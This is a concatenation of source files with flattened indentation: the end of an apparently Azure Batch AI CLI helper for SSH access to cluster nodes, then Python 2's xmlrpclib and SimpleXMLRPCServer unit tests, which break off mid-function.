cluster = client.get(resource_group, workspace_name, cluster_name) # type: models.Cluster
username = cluster.user_account_settings.admin_user_name
try:
signal.signal(signal.SIGINT, sigint_handler)
if ports:
local_addresses = [('0.0.0.0', int(p.split(':')[0])) for p in ports]
remote_addresses = [(p.split(':')[1], int(p.split(':')[2])) for p in ports]
if cmdline:
func = partial(_ssh_exec, ip, port, cmdline, username, password, ssh_private_key)
else:
def _sleep():
while True:
time.sleep(1)
func = _sleep
_create_tunnel(ip, port, username, password, ssh_private_key,
local_addresses, remote_addresses, func)
else:
_ssh_exec(ip, port, cmdline, username, password, ssh_private_key)
except (BaseSSHTunnelForwarderError, paramiko.ssh_exception.AuthenticationException) as e:
raise CLIError('Connection to remote host failed. Please check provided credentials. Error: {0}'.format(e))
def exec_on_job_node(client, resource_group, workspace_name, experiment_name, job_name, node_id=None, ports=None,
cmdline=None, password=None, ssh_private_key=None):
if not any((cmdline, ports)):
return
# find the node if was not provided
if not node_id:
nodes = list(client.jobs.list_remote_login_information(
resource_group, workspace_name, experiment_name, job_name))
if not nodes:
raise CLIError('No nodes available in the cluster')
node_id = nodes[0].node_id
# find the cluster
job = client.jobs.get(resource_group, workspace_name, experiment_name, job_name) # type: models.Job
cluster_id = parse_resource_id(job.cluster.id)
exec_on_node(client.clusters, cluster_id['resource_group'], cluster_id['name'],
cluster_id['resource_name'], node_id, ports, cmdline, password, ssh_private_key)
|
test_xmlrpc.py | import base64
import datetime
import sys
import time
import unittest
import xmlrpclib
import SimpleXMLRPCServer
import mimetools
import httplib
import socket
import StringIO
import os
import re
from test import test_support
try:
import threading
except ImportError:
threading = None
try:
unicode
except NameError:
have_unicode = False
else:
have_unicode = True
alist = [{'astring': 'foo@bar.baz.spam',
'afloat': 7283.43,
'anint': 2**20,
'ashortlong': 2L,
'anotherlist': ['.zyx.41'],
'abase64': xmlrpclib.Binary("my dog has fleas"),
'boolean': xmlrpclib.False,
'unicode': u'\u4000\u6000\u8000',
u'ukey\u4000': 'regular value',
'datetime1': xmlrpclib.DateTime('20050210T11:41:23'),
'datetime2': xmlrpclib.DateTime(
(2005, 02, 10, 11, 41, 23, 0, 1, -1)),
'datetime3': xmlrpclib.DateTime(
datetime.datetime(2005, 02, 10, 11, 41, 23)),
}]
class XMLRPCTestCase(unittest.TestCase):
def test_dump_load(self):
self.assertEquals(alist,
xmlrpclib.loads(xmlrpclib.dumps((alist,)))[0][0])
def test_dump_bare_datetime(self):
# This checks that an unwrapped datetime.date object can be handled
# by the marshalling code. This can't be done via test_dump_load()
# since with use_datetime set to 1 the unmarshaller would create
# datetime objects for the 'datetime[123]' keys as well
dt = datetime.datetime(2005, 02, 10, 11, 41, 23)
s = xmlrpclib.dumps((dt,))
(newdt,), m = xmlrpclib.loads(s, use_datetime=1)
self.assertEquals(newdt, dt)
self.assertEquals(m, None)
(newdt,), m = xmlrpclib.loads(s, use_datetime=0)
self.assertEquals(newdt, xmlrpclib.DateTime('20050210T11:41:23'))
def test_datetime_before_1900(self):
# same as before but with a date before 1900
dt = datetime.datetime(1, 02, 10, 11, 41, 23)
s = xmlrpclib.dumps((dt,))
(newdt,), m = xmlrpclib.loads(s, use_datetime=1)
self.assertEquals(newdt, dt)
self.assertEquals(m, None)
(newdt,), m = xmlrpclib.loads(s, use_datetime=0)
self.assertEquals(newdt, xmlrpclib.DateTime('00010210T11:41:23'))
def test_cmp_datetime_DateTime(self):
now = datetime.datetime.now()
dt = xmlrpclib.DateTime(now.timetuple())
self.assertTrue(dt == now)
self.assertTrue(now == dt)
then = now + datetime.timedelta(seconds=4)
self.assertTrue(then >= dt)
self.assertTrue(dt < then)
def test_bug_1164912 (self):
d = xmlrpclib.DateTime()
((new_d,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((d,),
methodresponse=True))
self.assertIsInstance(new_d.value, str)
# Check that the output of dumps() is still an 8-bit string
s = xmlrpclib.dumps((new_d,), methodresponse=True)
self.assertIsInstance(s, str)
def test_newstyle_class(self):
class T(object):
pass
t = T()
t.x = 100
t.y = "Hello"
((t2,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((t,)))
self.assertEquals(t2, t.__dict__)
def test_dump_big_long(self):
self.assertRaises(OverflowError, xmlrpclib.dumps, (2L**99,))
def test_dump_bad_dict(self):
self.assertRaises(TypeError, xmlrpclib.dumps, ({(1,2,3): 1},))
def test_dump_recursive_seq(self):
l = [1,2,3]
t = [3,4,5,l]
l.append(t)
self.assertRaises(TypeError, xmlrpclib.dumps, (l,))
def test_dump_recursive_dict(self):
d = {'1':1, '2':1}
t = {'3':3, 'd':d}
d['t'] = t
self.assertRaises(TypeError, xmlrpclib.dumps, (d,))
def test_dump_big_int(self):
if sys.maxint > 2L**31-1:
self.assertRaises(OverflowError, xmlrpclib.dumps,
(int(2L**34),))
xmlrpclib.dumps((xmlrpclib.MAXINT, xmlrpclib.MININT))
self.assertRaises(OverflowError, xmlrpclib.dumps, (xmlrpclib.MAXINT+1,))
self.assertRaises(OverflowError, xmlrpclib.dumps, (xmlrpclib.MININT-1,))
def dummy_write(s):
pass
m = xmlrpclib.Marshaller()
m.dump_int(xmlrpclib.MAXINT, dummy_write)
m.dump_int(xmlrpclib.MININT, dummy_write)
self.assertRaises(OverflowError, m.dump_int, xmlrpclib.MAXINT+1, dummy_write)
self.assertRaises(OverflowError, m.dump_int, xmlrpclib.MININT-1, dummy_write)
def test_dump_none(self):
value = alist + [None]
arg1 = (alist + [None],)
strg = xmlrpclib.dumps(arg1, allow_none=True)
self.assertEquals(value,
xmlrpclib.loads(strg)[0][0])
self.assertRaises(TypeError, xmlrpclib.dumps, (arg1,))
def test_default_encoding_issues(self):
# SF bug #1115989: wrong decoding in '_stringify'
utf8 = """<?xml version='1.0' encoding='iso-8859-1'?>
<params>
<param><value>
<string>abc \x95</string>
</value></param>
<param><value>
<struct>
<member>
<name>def \x96</name>
<value><string>ghi \x97</string></value>
</member>
</struct>
</value></param>
</params>
"""
# sys.setdefaultencoding() normally doesn't exist after site.py is
# loaded. Import a temporary fresh copy to get access to it
# but then restore the original copy to avoid messing with
# other potentially modified sys module attributes
old_encoding = sys.getdefaultencoding()
with test_support.CleanImport('sys'):
import sys as temp_sys
temp_sys.setdefaultencoding("iso-8859-1")
try:
(s, d), m = xmlrpclib.loads(utf8)
finally:
temp_sys.setdefaultencoding(old_encoding)
items = d.items()
if have_unicode:
self.assertEquals(s, u"abc \x95")
self.assertIsInstance(s, unicode)
self.assertEquals(items, [(u"def \x96", u"ghi \x97")])
self.assertIsInstance(items[0][0], unicode)
self.assertIsInstance(items[0][1], unicode)
else:
self.assertEquals(s, "abc \xc2\x95")
self.assertEquals(items, [("def \xc2\x96", "ghi \xc2\x97")])
class HelperTestCase(unittest.TestCase):
def test_escape(self):
self.assertEqual(xmlrpclib.escape("a&b"), "a&b")
self.assertEqual(xmlrpclib.escape("a<b"), "a<b")
self.assertEqual(xmlrpclib.escape("a>b"), "a>b")
class FaultTestCase(unittest.TestCase):
def test_repr(self):
f = xmlrpclib.Fault(42, 'Test Fault')
self.assertEqual(repr(f), "<Fault 42: 'Test Fault'>")
self.assertEqual(repr(f), str(f))
def test_dump_fault(self):
f = xmlrpclib.Fault(42, 'Test Fault')
s = xmlrpclib.dumps((f,))
(newf,), m = xmlrpclib.loads(s)
self.assertEquals(newf, {'faultCode': 42, 'faultString': 'Test Fault'})
self.assertEquals(m, None)
s = xmlrpclib.Marshaller().dumps(f)
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, s)
class DateTimeTestCase(unittest.TestCase):
def test_default(self):
t = xmlrpclib.DateTime()
def test_time(self):
d = 1181399930.036952
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", time.localtime(d)))
def test_time_tuple(self):
d = (2007,6,9,10,38,50,5,160,0)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070609T10:38:50')
def test_time_struct(self):
d = time.localtime(1181399930.036952)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", d))
def test_datetime_datetime(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070102T03:04:05')
def test_repr(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
val ="<DateTime '20070102T03:04:05' at %x>" % id(t)
self.assertEqual(repr(t), val)
def test_decode(self):
d = ' 20070908T07:11:13 '
t1 = xmlrpclib.DateTime()
t1.decode(d)
tref = xmlrpclib.DateTime(datetime.datetime(2007,9,8,7,11,13))
self.assertEqual(t1, tref)
t2 = xmlrpclib._datetime(d)
self.assertEqual(t1, tref)
class BinaryTestCase(unittest.TestCase):
def test_default(self):
t = xmlrpclib.Binary()
self.assertEqual(str(t), '')
def test_string(self):
d = '\x01\x02\x03abc123\xff\xfe'
t = xmlrpclib.Binary(d)
self.assertEqual(str(t), d)
def test_decode(self):
d = '\x01\x02\x03abc123\xff\xfe'
de = base64.encodestring(d)
t1 = xmlrpclib.Binary()
t1.decode(de)
self.assertEqual(str(t1), d)
t2 = xmlrpclib._binary(de)
self.assertEqual(str(t2), d)
ADDR = PORT = URL = None
# The evt is set twice. First when the server is ready to serve.
# Second when the server has been shutdown. The user must clear
# the event after it has been set the first time to catch the second set.
def http_server(evt, numrequests, requestHandler=None):
class TestInstanceClass:
def div(self, x, y):
return x // y
def _methodHelp(self, name):
if name == 'div':
return 'This is the div function'
def my_function():
'''This is my function'''
return True
class MyXMLRPCServer(SimpleXMLRPCServer.SimpleXMLRPCServer):
def get_request(self):
# Ensure the socket is always non-blocking. On Linux, socket
# attributes are not inherited like they are on *BSD and Windows.
s, port = self.socket.accept()
s.setblocking(True)
return s, port
if not requestHandler:
requestHandler = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler
serv = MyXMLRPCServer(("localhost", 0), requestHandler,
logRequests=False, bind_and_activate=False)
try:
serv.socket.settimeout(3)
serv.server_bind()
global ADDR, PORT, URL
ADDR, PORT = serv.socket.getsockname()
#connect to IP address directly. This avoids socket.create_connection()
#trying to connect to to "localhost" using all address families, which
#causes slowdown e.g. on vista which supports AF_INET6. The server listens
#on AF_INET only.
URL = "http://%s:%d"%(ADDR, PORT)
serv.server_activate()
serv.register_introspection_functions()
serv.register_multicall_functions()
serv.register_function(pow)
serv.register_function(lambda x,y: x+y, 'add')
serv.register_function(my_function)
serv.register_instance(TestInstanceClass())
evt.set()
# handle up to 'numrequests' requests
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.socket.close()
PORT = None
evt.set()
def http_multi_server(evt, numrequests, requestHandler=None):
class TestInstanceClass:
def div(self, x, y):
return x // y
def _methodHelp(self, name):
if name == 'div':
return 'This is the div function'
def my_function():
'''This is my function'''
return True
class MyXMLRPCServer(SimpleXMLRPCServer.MultiPathXMLRPCServer):
def get_request(self):
# Ensure the socket is always non-blocking. On Linux, socket
# attributes are not inherited like they are on *BSD and Windows.
s, port = self.socket.accept()
s.setblocking(True)
return s, port
if not requestHandler:
requestHandler = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler
class MyRequestHandler(requestHandler):
rpc_paths = []
serv = MyXMLRPCServer(("localhost", 0), MyRequestHandler,
logRequests=False, bind_and_activate=False)
serv.socket.settimeout(3)
serv.server_bind()
try:
global ADDR, PORT, URL
ADDR, PORT = serv.socket.getsockname()
#connect to IP address directly. This avoids socket.create_connection()
#trying to connect to to "localhost" using all address families, which
#causes slowdown e.g. on vista which supports AF_INET6. The server listens
#on AF_INET only.
URL = "http://%s:%d"%(ADDR, PORT)
serv.server_activate()
paths = ["/foo", "/foo/bar"]
for path in paths:
d = serv.add_dispatcher(path, SimpleXMLRPCServer.SimpleXMLRPCDispatcher())
d.register_introspection_functions()
d.register_multicall_functions()
serv.get_dispatcher(paths[0]).register_function(pow)
serv.get_dispatcher(paths[1]).register_function(lambda x,y: x+y, 'add')
evt.set()
# handle up to 'numrequests' requests
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.socket.close()
PORT = None
evt.set()
# This function prevents errors like:
# <ProtocolError for localhost:57527/RPC2: 500 Internal Server Error>
def is_unavailable_exception(e):
'''Returns True if the given ProtocolError is the product of a server-side
exception caused by the 'temporarily unavailable' response sometimes
given by operations on non-blocking sockets.'''
# sometimes we get a -1 error code and/or empty headers
try:
if e.errcode == -1 or e.headers is None:
return True
exc_mess = e.headers.get('X-exception')
except AttributeError:
# Ignore socket.errors here.
exc_mess = str(e)
if exc_mess and 'temporarily unavailable' in exc_mess.lower():
return True
return False
@unittest.skipUnless(threading, 'Threading required for this test.')
class BaseServerTestCase(unittest.TestCase):
requestHandler = None
request_count = 1
threadFunc = staticmethod(http_server)
def setUp(self):
# enable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, self.request_count, self.requestHandler)
threading.Thread(target=self.threadFunc, args=serv_args).start()
# wait for the server to be ready
self.evt.wait(10)
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait(10)
# disable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = False
# NOTE: The tests in SimpleServerTestCase will ignore failures caused by
# "temporarily unavailable" exceptions raised in SimpleXMLRPCServer. This
# condition occurs infrequently on some platforms, frequently on others, and
# is apparently caused by using SimpleXMLRPCServer with a non-blocking socket
# If the server class is updated at some point in the future to handle this
# situation more gracefully, these tests should be modified appropriately.
class SimpleServerTestCase(BaseServerTestCase):
def test_simple1(self):
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_nonascii(self):
start_string = 'P\N{LATIN SMALL LETTER Y WITH CIRCUMFLEX}t'
end_string = 'h\N{LATIN SMALL LETTER O WITH HORN}n'
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.add(start_string, end_string),
start_string + end_string)
except (xmlrpclib.ProtocolError, socket.error) as e:
# ignore failures due to non-blocking socket unavailable errors.
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
# [ch] The test 404 is causing lots of false alarms.
def XXXtest_404(self):
# send POST with httplib, it should return 404 header and
# 'Not Found' message.
conn = httplib.HTTPConnection(ADDR, PORT)
conn.request('POST', '/this-is-not-valid')
response = conn.getresponse()
conn.close()
self.assertEqual(response.status, 404)
self.assertEqual(response.reason, 'Not Found')
def test_introspection1(self):
try:
p = xmlrpclib.ServerProxy(URL)
meth = p.system.listMethods()
expected_methods = set(['pow', 'div', 'my_function', 'add',
'system.listMethods', 'system.methodHelp',
'system.methodSignature', 'system.multicall'])
self.assertEqual(set(meth), expected_methods)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection2(self):
try:
# test _methodHelp()
p = xmlrpclib.ServerProxy(URL)
divhelp = p.system.methodHelp('div')
self.assertEqual(divhelp, 'This is the div function')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_introspection3(self):
try:
# test native doc
p = xmlrpclib.ServerProxy(URL)
myfunction = p.system.methodHelp('my_function')
self.assertEqual(myfunction, 'This is my function')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection4(self):
# the SimpleXMLRPCServer doesn't support signatures, but
# at least check that we can try making the call
try:
p = xmlrpclib.ServerProxy(URL)
divsig = p.system.methodSignature('div')
self.assertEqual(divsig, 'signatures not supported')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_multicall(self):
try:
p = xmlrpclib.ServerProxy(URL)
multicall = xmlrpclib.MultiCall(p)
multicall.add(2,3)
multicall.pow(6,8)
multicall.div(127,42)
add_result, pow_result, div_result = multicall()
self.assertEqual(add_result, 2+3)
self.assertEqual(pow_result, 6**8)
self.assertEqual(div_result, 127//42)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_non_existing_multicall(self):
try:
p = xmlrpclib.ServerProxy(URL)
multicall = xmlrpclib.MultiCall(p)
multicall.this_is_not_exists()
result = multicall()
# result.results contains;
# [{'faultCode': 1, 'faultString': '<type \'exceptions.Exception\'>:'
# 'method "this_is_not_exists" is not supported'>}]
self.assertEqual(result.results[0]['faultCode'], 1)
self.assertEqual(result.results[0]['faultString'],
'<type \'exceptions.Exception\'>:method "this_is_not_exists" '
'is not supported')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_dotted_attribute(self):
# Raises an AttributeError because private methods are not allowed.
self.assertRaises(AttributeError,
SimpleXMLRPCServer.resolve_dotted_attribute, str, '__add')
self.assertTrue(SimpleXMLRPCServer.resolve_dotted_attribute(str, 'title'))
# Get the test to run faster by sending a request with test_simple1.
# This avoids waiting for the socket timeout.
self.test_simple1()
class MultiPathServerTestCase(BaseServerTestCase):
threadFunc = staticmethod(http_multi_server)
request_count = 2
def test_path1(self):
p = xmlrpclib.ServerProxy(URL+"/foo")
self.assertEqual(p.pow(6,8), 6**8)
self.assertRaises(xmlrpclib.Fault, p.add, 6, 8)
def test_path2(self):
p = xmlrpclib.ServerProxy(URL+"/foo/bar")
self.assertEqual(p.add(6,8), 6+8)
self.assertRaises(xmlrpclib.Fault, p.pow, 6, 8)
#A test case that verifies that a server using the HTTP/1.1 keep-alive mechanism
#does indeed serve subsequent requests on the same connection
class BaseKeepaliveServerTestCase(BaseServerTestCase):
#a request handler that supports keep-alive and logs requests into a
#class variable
class RequestHandler(SimpleXMLRPCServer.SimpleXMLRPCRequestHandler):
parentClass = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler
protocol_version = 'HTTP/1.1'
myRequests = []
def handle(self):
self.myRequests.append([])
self.reqidx = len(self.myRequests)-1
return self.parentClass.handle(self)
def handle_one_request(self):
result = self.parentClass.handle_one_request(self)
self.myRequests[self.reqidx].append(self.raw_requestline)
return result
requestHandler = RequestHandler
def setUp(self):
#clear request log
self.RequestHandler.myRequests = []
return BaseServerTestCase.setUp(self)
#A test case that verifies that a server using the HTTP/1.1 keep-alive mechanism
#does indeed serve subsequent requests on the same connection
class KeepaliveServerTestCase1(BaseKeepaliveServerTestCase):
def test_two(self):
p = xmlrpclib.ServerProxy(URL)
#do three requests.
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
#they should have all been handled by a single request handler
self.assertEqual(len(self.RequestHandler.myRequests), 1)
#check that we did at least two (the third may be pending append
#due to thread scheduling)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-1]), 2)
#test special attribute access on the serverproxy, through the __call__
#function.
class KeepaliveServerTestCase2(BaseKeepaliveServerTestCase):
#ask for two keepalive requests to be handled.
request_count=2
def test_close(self):
p = xmlrpclib.ServerProxy(URL)
#do some requests with close.
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
p("close")() #this should trigger a new keep-alive request
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
#they should have all been two request handlers, each having logged at least
#two complete requests
self.assertEqual(len(self.RequestHandler.myRequests), 2)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-1]), 2)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-2]), 2)
def test_transport(self):
p = xmlrpclib.ServerProxy(URL)
#do some requests with close.
self.assertEqual(p.pow(6,8), 6**8)
p("transport").close() #same as above, really.
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(len(self.RequestHandler.myRequests), 2)
#A test case that verifies that gzip encoding works in both directions
#(for a request and the response)
class GzipServerTestCase(BaseServerTestCase):
#a request handler that supports keep-alive and logs requests into a
#class variable
class RequestHandler(SimpleXMLRPCServer.SimpleXMLRPCRequestHandler):
parentClass = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler
protocol_version = 'HTTP/1.1'
def do_POST(self):
#store content of last request in class
self.__class__.content_length = int(self.headers["content-length"])
return self.parentClass.do_POST(self)
requestHandler = RequestHandler
class Transport(xmlrpclib.Transport):
#custom transport, stores the response length for our perusal
fake_gzip = False
def parse_response(self, response):
self.response_length=int(response.getheader("content-length", 0))
return xmlrpclib.Transport.parse_response(self, response)
def send_content(self, connection, body):
if self.fake_gzip:
#add a lone gzip header to induce decode error remotely
connection.putheader("Content-Encoding", "gzip")
return xmlrpclib.Transport.send_content(self, connection, body)
def setUp(self):
BaseServerTestCase.setUp(self)
def test_gzip_request(self):
t = self.Transport()
t.encode_threshold = None
p = xmlrpclib.ServerProxy(URL, transport=t)
self.assertEqual(p.pow(6,8), 6**8)
a = self.RequestHandler.content_length
t.encode_threshold = 0 #turn on request encoding
self.assertEqual(p.pow(6,8), 6**8)
b = self.RequestHandler.content_length
self.assertTrue(a>b)
def test_bad_gzip_request(self):
t = self.Transport()
t.encode_threshold = None
t.fake_gzip = True
p = xmlrpclib.ServerProxy(URL, transport=t)
cm = self.assertRaisesRegexp(xmlrpclib.ProtocolError,
re.compile(r"\b400\b"))
with cm:
p.pow(6, 8)
def test_gsip_response(self):
t = self.Transport()
p = xmlrpclib.ServerProxy(URL, transport=t)
old = self.requestHandler.encode_threshold
self.requestHandler.encode_threshold = None #no encoding
self.assertEqual(p.pow(6,8), 6**8)
a = t.response_length
self.requestHandler.encode_threshold = 0 #always encode
self.assertEqual(p.pow(6,8), 6**8)
b = t.response_length
self.requestHandler.encode_threshold = old
self.assertTrue(a>b)
#Test special attributes of the ServerProxy object
class ServerProxyTestCase(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
if threading:
self.url = URL
else:
# Without threading, http_server() and http_multi_server() will not
# be executed and URL is still equal to None. 'http://' is a just
# enough to choose the scheme (HTTP)
self.url = 'http://'
def test_close(self):
p = xmlrpclib.ServerProxy(self.url)
self.assertEqual(p('close')(), None)
def test_transport(self):
t = xmlrpclib.Transport()
p = xmlrpclib.ServerProxy(self.url, transport=t)
self.assertEqual(p('transport'), t)
# This is a contrived way to make a failure occur on the server side
# in order to test the _send_traceback_header flag on the server
class FailingMessageClass(mimetools.Message):
def __getitem__(self, key):
key = key.lower()
if key == 'content-length':
return 'I am broken'
return mimetools.Message.__getitem__(self, key)
@unittest.skipUnless(threading, 'Threading required for this test.')
class FailingServerTestCase(unittest.TestCase):
def setUp(self):
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, 1)
threading.Thread(target=http_server, args=serv_args).start()
# wait for the server to be ready
self.evt.wait()
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# reset flag
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = False
# reset message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = mimetools.Message
def test_basic(self):
# check that flag is false by default
flagval = SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header
self.assertEqual(flagval, False)
# enable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
# test a call that shouldn't fail just as a smoke test
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_fail_no_info(self):
# use the broken message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
try:
p = xmlrpclib.ServerProxy(URL)
p.pow(6,8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# The two server-side error headers shouldn't be sent back in this case
self.assertTrue(e.headers.get("X-exception") is None)
self.assertTrue(e.headers.get("X-traceback") is None)
else:
self.fail('ProtocolError not raised')
def test_fail_with_info(self):
# use the broken message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
# Check that errors in the server send back exception/traceback
# info when flag is set
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
try:
p = xmlrpclib.ServerProxy(URL)
p.pow(6,8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# We should get error info in the response
expected_err = "invalid literal for int() with base 10: 'I am broken'"
self.assertEqual(e.headers.get("x-exception"), expected_err)
self.assertTrue(e.headers.get("x-traceback") is not None)
else:
self.fail('ProtocolError not raised')
class CGIHandlerTestCase(unittest.TestCase):
def setUp(self):
self.cgi = SimpleXMLRPCServer.CGIXMLRPCRequestHandler()
def tearDown(self):
self.cgi = None
def test_cgi_get(self):
with test_support.EnvironmentVarGuard() as env:
env['REQUEST_METHOD'] = 'GET'
# if the method is GET and no request_text is given, it runs handle_get
# get sysout output
with test_support.captured_stdout() as data_out:
self.cgi.handle_request()
# parse Status header
data_out.seek(0)
handle = data_out.read()
status = handle.split()[1]
message = ' '.join(handle.split()[2:4])
self.assertEqual(status, '400')
self.assertEqual(message, 'Bad Request')
def test_cgi_xmlrpc_response(self):
data = """<?xml version='1.0'?>
<methodCall>
<methodName>test_method</methodName>
<params>
<param>
<value><string>foo</string></value>
</param>
<param>
<value><string>bar</string></value>
</param>
</params>
</methodCall>
"""
with test_support.EnvironmentVarGuard() as env, \
test_support.captured_stdout() as data_out, \
test_support.captured_stdin() as data_in:
data_in.write(data)
data_in.seek(0)
env['CONTENT_LENGTH'] = str(len(data))
self.cgi.handle_request()
data_out.seek(0)
# will respond exception, if so, our goal is achieved ;)
handle = data_out.read()
# start with 44th char so as not to get http header, we just need only xml
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, handle[44:])
# Also test the content-length returned by handle_request
# Using the same test method inorder to avoid all the datapassing
# boilerplate code.
# Test for bug: http://bugs.python.org/issue5040
content = handle[handle.find("<?xml"):]
self.assertEquals(
int(re.search('Content-Length: (\d+)', handle).group(1)),
len(content))
class FakeSocket:
def __init__(self):
self.data = StringIO.StringIO()
def send(self, buf):
self.data.write(buf)
return len(buf)
def sendall(self, buf):
self.data.write(buf)
def getvalue(self):
return self.data.getvalue()
def makefile(self, x='r', y=-1):
raise RuntimeError
def close(self):
pass
class FakeTransport(xmlrpclib.Transport):
"""A Transport instance that records instead of sending a request.
This class replaces the actual socket used by httplib with a
FakeSocket object that records the request. It doesn't provide a
response.
"""
def make_connection(self, host):
conn = xmlrpclib.Transport.make_connection(self, host)
conn.sock = self.fake_socket = FakeSocket()
return conn
class TransportSubclassTestCase(unittest.TestCase):
def issue_request(self, transport_class):
"""Return an HTTP request made via transport_class."""
transport = transport_class()
proxy = xmlrpclib.ServerProxy("http://example.com/",
transport=transport)
try:
proxy.pow(6, 8)
except RuntimeError:
return transport.fake_socket.getvalue()
return None
def test_custom_user_agent(self):
class TestTransport(FakeTransport):
def send_user_agent(self, conn):
xmlrpclib.Transport.send_user_agent(self, conn)
conn.putheader("X-Test", "test_custom_user_agent")
req = self.issue_request(TestTransport)
self.assertIn("X-Test: test_custom_user_agent\r\n", req)
def test_send_host(self):
class TestTransport(FakeTransport):
def send_host(self, conn, host):
xmlrpclib.Transport.send_host(self, conn, host)
conn.putheader("X-Test", "test_send_host")
req = self.issue_request(TestTransport)
self.assertIn("X-Test: test_send_host\r\n", req)
def test_send_request(self):
class TestTransport(FakeTransport):
def send_request(self, conn, url, body):
xmlrpclib.Transport.send_request(self, conn, url, body)
conn.putheader("X-Test", "test_send_request")
req = self.issue_request(TestTransport)
self.assertIn("X-Test: test_send_request\r\n", req)
def test_send_content(self):
class TestTransport(FakeTransport):
def send_content(self, conn, body):
conn.putheader("X-Test", "test_send_content")
xmlrpclib.Transport.send_content(self, conn, body)
req = self.issue_request(TestTransport)
self.assertIn("X-Test: test_send_content\r\n", req)
@test_support.reap_threads
def test_main():
xmlrpc_tests = [XMLRPCTestCase, HelperTestCase, DateTimeTestCase,
BinaryTestCase, FaultTestCase, TransportSubclassTestCase]
xmlrpc_tests.append(SimpleServerTestCase)
xmlrpc_tests.append(KeepaliveServerTestCase1)
xmlrpc_tests.append(KeepaliveServerTestCase2)
try:
import gzip
xmlrpc_tests.append(GzipServerTestCase)
except ImportError:
